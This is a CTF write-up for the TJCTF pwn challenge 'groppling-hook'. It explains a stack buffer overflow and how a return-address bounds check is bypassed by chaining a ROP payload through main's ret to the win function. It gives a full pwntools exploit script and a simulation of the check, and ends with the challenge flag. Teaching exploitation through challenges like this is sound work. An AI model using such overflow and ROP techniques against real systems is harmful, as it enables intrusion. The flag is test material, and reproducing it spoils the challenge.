# groppling-hook

## Problem

<details>

<summary>Description</summary>

Gropple to safety?

`nc tjc.tf 31080`

</details>

## Solution

<figure><img src="/files/QWkco6mO7cvkNdsrLZOT" alt=""><figcaption><p>checksec</p></figcaption></figure>

As the name suggests, this will most likely be a ROP-style challenge. checksec reveals that PIE and the stack canary are not present, which will make the exploit easier. We're given the source code, so let's check that out.

<figure><img src="/files/UoRSAAJN05jf6INI0zJT" alt="" width="406"><figcaption><p>pwnable in source code</p></figcaption></figure>

The relevant function is `pwnable`: it reads 56 bytes into a buffer of size 10, which is a buffer overflow. We can calculate the offset by adding the buffer size to the 8 bytes of saved RBP, which gives 18 as the offset needed to overwrite the return address (RIP) with the address of the `win` function. However, there seems to be a check on the return address being set. Let's decompile this in Ghidra to make it easier to read.

<figure><img src="/files/N2qHaSB79UBLXHnOw5Gn" alt="" width="377"><figcaption><p>decompiled pwnable</p></figcaption></figure>

It seems to check the boundaries of the return address; if those conditions are met it calls `laugh()`, which exits the program and ruins our ROP exploit. Looking at the address of `win`, we notice that it satisfies the condition, so the program will exit instead of calling `win`.

<figure><img src="/files/beM2FWJoHv3V9mMsbuaF" alt="" width="563"><figcaption><p>disassembled win</p></figcaption></figure>

To bypass this, instead of returning straight to `win`, we chain our ROP: first return to an address that doesn't satisfy the condition, and from there return to `win`. There are two ways of doing this: use the `ret;` gadget found by `ropper`, or simply return to the return instruction in `main` and let that return go to our `win` function, since neither of them satisfies the condition that calls `laugh`.

<figure><img src="/files/aMyWsBBJjsroJKkYEkYs" alt="" width="458"><figcaption><p>ropper ret; gadget</p></figcaption></figure>

<figure><img src="/files/qiJoMXQojIcd1AqGAFts" alt="" width="563"><figcaption><p>disassembled main</p></figcaption></figure>

In the end I decided to utilise the return instruction in `main` to chain the ROP payload.

{% code title="exploit.py" lineNumbers="true" fullWidth="false" %}

```python
#!/usr/bin/env python3
from pwn import *

# =========================================================
#                          SETUP                         
# =========================================================
exe = './out'
elf = context.binary = ELF(exe, checksec=True)
context.log_level = 'debug'
host = 'tjc.tf'
port = 31080

def start(argv=[], *a, **kw):
    if args.GDB:  # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:  # ('server', 'port')
        return remote(host, port, *a, **kw)
    else:  # Run locally
        return process([exe] + argv, *a, **kw)

gdbscript = '''
init-pwndbg
break *main
'''.format(**locals())

io = start()

# =========================================================
#                         ADDRESSES
# =========================================================
# Got manually through cyclic gdb-pwndbg
offset = 18

# pwnable's check on the saved return address: laugh() is called when it
# falls outside main's range (0x401263 .. 0x40128a), so win (0x4011b3) is
# rejected directly, but main's own ret instruction is accepted.
main_ret = 0x40128a
win = 0x4011b3

# =========================================================
#                         EXPLOITS
# =========================================================
payload = flat({
    offset: [
        main_ret,
        win
    ]
})

io.sendlineafter(b'> ', payload)

io.interactive()
```

{% endcode %}
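To make the bypass above concrete without running the binary, here is an added model (not part of the original writeup) of the stack layout and the return-address check. It assumes the check rejects any saved return address outside main's range `0x401263..0x40128a` (inferred from the decompiled screenshot) and that `main`'s `ret` pops the next stack qword without any check.

```python
import struct

# Values from the writeup (no PIE, so addresses are fixed)
BUF_SIZE = 10
SAVED_RBP = 8
OFFSET = BUF_SIZE + SAVED_RBP          # 18, matches the cyclic result
MAIN_RET = 0x40128A
WIN = 0x4011B3
# Assumed reading of the decompiled check: laugh() fires when the saved
# return address lies outside main's code range.
LOW, HIGH = 0x401263, 0x40128A


def build_payload(chain):
    """Same layout pwntools' flat({OFFSET: chain}) produces: padding + qwords."""
    return b"A" * OFFSET + b"".join(struct.pack("<Q", a) for a in chain)


def saved_rip(payload):
    """The value that lands in the saved RIP slot after the overflow."""
    return struct.unpack_from("<Q", payload, OFFSET)[0]


def laugh_would_fire(addr):
    """Model of pwnable's bounds check on the first return address."""
    return addr < LOW or addr > HIGH


def simulate(chain):
    """Return 'laugh' if the check rejects the chain, else the address
    control finally reaches. Only the first return is checked; main's
    ret then pops the next qword from the chain unchecked."""
    rip = saved_rip(build_payload(chain))
    if laugh_would_fire(rip):
        return "laugh"
    if rip == MAIN_RET and len(chain) > 1:
        return chain[1]
    return rip


if __name__ == "__main__":
    print("direct win:", simulate([WIN]))              # rejected by the check
    print("via main ret:", hex(simulate([MAIN_RET, WIN])))
```

The point the model makes is that a bounds check on the single overwritten return address does not stop a chain whose first hop is itself inside the allowed range.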

## Flag

> ***tjctf{this\_i#-my-questsss}***